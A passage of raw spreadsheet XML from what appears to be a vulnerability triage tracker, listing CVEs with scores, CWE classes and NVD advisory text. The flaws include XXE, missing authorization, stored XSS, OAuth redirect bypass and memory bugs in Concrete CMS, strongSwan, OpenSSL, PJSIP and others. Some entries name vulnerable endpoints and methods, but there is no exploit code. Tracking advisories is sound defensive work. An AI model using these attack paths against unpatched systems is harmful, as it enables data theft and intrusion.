      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr"/>
      <c r="Q683" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity references in the RemoteQueryCachePlugin in AWS Advanced JDBC Wrapper 3.3.0 through 4.2.0 might allow an actor with write access to the shared cache infrastructure to disclose sensitive files from application hosts that read cached query results, including stored database and IAM role credentials, via crafted XML data in a cached column value.
To remediate this issue, users should upgrade to version 4.3.0 or later.</t>
        </is>
      </c>
      <c r="S683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18061</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18122</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr"/>
      <c r="Q684" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9.2.0 to 9.5.2 Express REST API list endpoint exposes restricted Express entries via Missing Authorization; the Concrete CMS REST API's Express entry collection endpoint disabled the per-entry view permission check. An OAuth token with read scope for an Express entity could enumerate entries that its user context lacked permission to view, disclosing each entry's public identifier, URL, label, dates, and any attribute or associated-entry data requested via the includes parameter. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18122</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68528</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr"/>
      <c r="Q685" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS RSS Displayer block below version 9.5.3  rendered remote feed item titles without HTML escaping, resulting in stored cross-site scripting. An attacker able to control a title in a syndicated feed could execute script in the site origin for any visitor to the affected page, including administrators, without holding an account on that site. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68528</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81533</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>mongodb:bi_connector_odbc_driver</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr"/>
      <c r="Q686" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>An application using the MongoDB BI Connector ODBC Driver may encounter a memory-safety issue when a submitted SQL statement contains an unusually long run of digits following a LIMIT clause. The issue occurs only on connections where the driver's optional prefetch setting is enabled, and stems from the driver copying the digit sequence into a fixed-size internal buffer without checking its length. A user able to influence the numeric portion of a LIMIT clause could cause the hosting application process to terminate unexpectedly or corrupt adjacent memory in that process.</t>
        </is>
      </c>
      <c r="S686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81533</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81908</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr"/>
      <c r="Q687" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9.2.0 to 9.5.2 contain a missing authorization vulnerability in the REST API Groups list endpoint. The listGroups() method in concrete/src/Api/Controller/Groups.php registers a permissions checker callback that unconditionally returns true, so no per-object (tree node) authorization is enforced when the group collection is returned. An authenticated user whose API token carries the groups:read scope can call GET /ccm/api/1.0/groups and receive every group on the site regardless of the view permissions on those groups, disclosing the organization's group structure, roles, and access hierarchy. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting.</t>
        </is>
      </c>
      <c r="S687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81908</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90452</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr"/>
      <c r="Q688" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>Requests from the reverse proxy to the identity-provider service for token discovery, introspection, and credential exchange do not verify the identity provider's server certificate. An attacker positioned on the network path between the proxy and the identity provider could impersonate the identity provider and issue forged authentication tokens accepted by the deployment.</t>
        </is>
      </c>
      <c r="S688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90452</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57164</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr"/>
      <c r="Q689" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 8d5956a, a heap buffer overflow exists in the PJLIB-UTIL HTTP client (http_client.c) when buffering an HTTP response body. This affects applications that use the PJLIB-UTIL HTTP client to receive a whole response body at once (a completion callback with no incremental on_data_read callback). When growing the response buffer, an incorrect size calculation based on the server-supplied Content-Length can leave the buffer too small, causing response data to be written past the end of the allocation. A malicious or man-in-the-middle HTTP server can trigger this with a crafted response; impact may range from unexpected application termination to memory corruption. Applications that consume the response incrementally (via on_data_read), or that only connect to trusted servers, are not affected. This issue has been patched via commit 8d5956a.</t>
        </is>
      </c>
      <c r="S689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57164</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63074</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K690" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr"/>
      <c r="Q690" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The OpenSSL Certificate Management Protocol (CMP) caches
additional certificates (extraCerts) sent in a CMP message, but never expunges
them (for instance if they are invalid).  If a server reuses an OSSL_CMP_CTX
frequently, this cache of extraCerts may grow unboundedly, and a malicious
client may flood a CMP server with requests driving this growth.
Impact summary: Users utilizing a CMP server that reuses a single OSSL_CMP_CTX
for the lifetime of a server process may observe unbounded memory growth in the
event a malicious client repeatedly sends requests containing unique extra
certificates, which may lead to OOM conditions.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: If a remote user sends CMP messages to a server with a list of
extraCerts and the message is rejected, the extraCerts from the message remains
in the server contexts untrusted certificate stack.  This exposes servers with
long lived ctx objects to Denial of Service attacks in which an attacker sends
messages intending to be rejected with a large list of additional certificates
repeatedly, forcing the server to store them indefinitely.
The issue was fixed by removing the added extra certs if the message is
rejected, using the same method as when the context is configured to not do
caching at all.
FIPS impact: no
As the CMP code lives outside the FIPS module boundary, no FIPS
modules are affected by this CVE.</t>
        </is>
      </c>
      <c r="S690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63074</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73310</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr"/>
      <c r="Q691" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t>
        </is>
      </c>
      <c r="S691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78123</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr"/>
      <c r="Q692" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 has an Expired Pointer Dereference in PKCS#7 parsing in the openssl plugin.</t>
        </is>
      </c>
      <c r="S692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78123</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78126</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr"/>
      <c r="Q693" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.1.10 through 6.0.7 allows a NULL pointer dereference in the eap-aka plugin.</t>
        </is>
      </c>
      <c r="S693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78126</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78129</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr"/>
      <c r="Q694" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.6.2 through 6.0.7 has an infinite loop in PKCS#5 decryption.</t>
        </is>
      </c>
      <c r="S694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78129</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81861</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr"/>
      <c r="Q695" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>CWE-522: Insufficiently Protected Credentials vulnerability that could result in exposure of authentication information and unauthorized access to RTU functionality.</t>
        </is>
      </c>
      <c r="S695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81861</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81909</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr"/>
      <c r="Q696" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9 through 9.5.2 is vulnerable to Missing Authorization in the block alias route (Process::alias() in concrete/controllers/backend/block/process.php).It does not verify that the referenced block is genuinely orphaned on the target page, nor that the caller holds any permission over the source block. A user granted only an area-scoped add_block_to_area delegation on their own page can therefore pass any block ID on the site: the source block's content is duplicated into an area the rogue editor controls, disclosing that content, and the original block is then force-deleted in the same request, destroying arbitrary site content. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.9 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="S696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81909</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82215</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr"/>
      <c r="Q697" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>The Payment Gateway PayPay for WooCommerce WordPress plugin from 0.5 to 0.9.3 does not verify the authenticity of the payment notifications it receives before acting on them, allowing unauthenticated attackers who know the store's merchant identifier to mark arbitrary orders as paid, or to cancel or fail them.</t>
        </is>
      </c>
      <c r="S697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82215</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84890</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr"/>
      <c r="Q698" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R698" s="5" t="inlineStr">
        <is>
